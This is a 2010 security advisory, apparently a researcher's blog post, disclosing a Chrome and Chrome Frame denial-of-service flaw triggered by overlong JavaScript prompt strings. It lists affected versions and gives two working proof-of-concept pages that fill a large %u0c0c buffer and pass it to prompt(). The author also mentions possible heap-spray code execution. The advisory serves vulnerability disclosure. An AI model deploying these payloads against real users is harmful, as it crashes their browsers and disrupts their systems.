###############################################
Google Chrome and Chrome frame Prompt DoS
Vendor URL: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Advosore spanish:http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Vendor notify: YES exploit available:YES
###############################################
This Bug was discoveres by me and i have tested it
and investigate with Climbo From #ayuda-informaticos
on irc-hispano channel.
#########
abstract
#########
Some times the web aplications need to Prompt some data to users,
it can prompt via javascript code , or via html forms ...
In the case of javascript prompts what´s happend if
the data to prompt ( the question) is very long ?¿
################
Google chrome is prone vulnerable to a Denial of service
condition via "alert prompts" wen the data expected is very long ...
i don´t know if this can be turn in a remote code execution or
memory corruption with some heap spray or similar but i think
that this need to be analyze & patch
###################
Versions Tested
###################
In all cases chrome is the vector to do
something in all systems :)
######################
MAC OS X leopard 10.5
######################
Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818
In all cases OS X closes all Chrome Windows.( Chrome Crash)
##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser
In al cases Chrome is minimized and denies the access to
"window manager button" and we can´t no change beetwen applications
that we have open.
##################
Windows 7 32 bits
###################
Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.
It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.
###############
Debian 2.6.26
###############
Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3
in all cases Debian Closes all chrome Windows.( Chrome Crash)
####################
Proof Of Concepts
####################
this PoC is for testing in win7 32 bits, chrome
and chrome frame in conjuncion with ie8 that causes
a DoS in ie8
#############################
<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################
This second PoC is for test in Linux or in Mac OS X
#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################
############
References
############
related vuln:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html
Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617
################### €nd ###################
Thnx To Climbo for his patience and support.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)